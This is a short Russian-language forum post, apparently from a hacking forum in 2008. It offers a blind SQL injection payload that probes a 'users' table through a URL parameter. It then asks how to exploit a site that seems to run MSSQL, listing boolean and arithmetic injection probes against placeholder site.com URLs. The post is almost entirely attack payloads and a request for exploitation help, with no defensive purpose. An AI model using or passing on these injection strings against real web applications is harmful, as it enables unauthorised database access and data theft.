12.06.2008, 20:02
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802
Репутация:
52
|
|
2 Велемир
А если так?
http://www.site.com/script.php?id=38+and+substring((select+1+from+user s),1,1)=1/*
---
2 all.
У меня тоже вопросик.
http://www.site.com/aindex.cfm?part=2042513+and+1=1-- - выполняется
http://www.site.com/aindex.cfm?part=2042513+and+1=0-- - перебрасывает на страницу с ошибкой
http://www.site.com/aindex.cfm?part=2042513-1-- - выводит http://www.site.com/aindex.cfm?part=2042512
Как я понимаю тут MSSQL, но вот как его крутить в такой ситуации?
|
|
|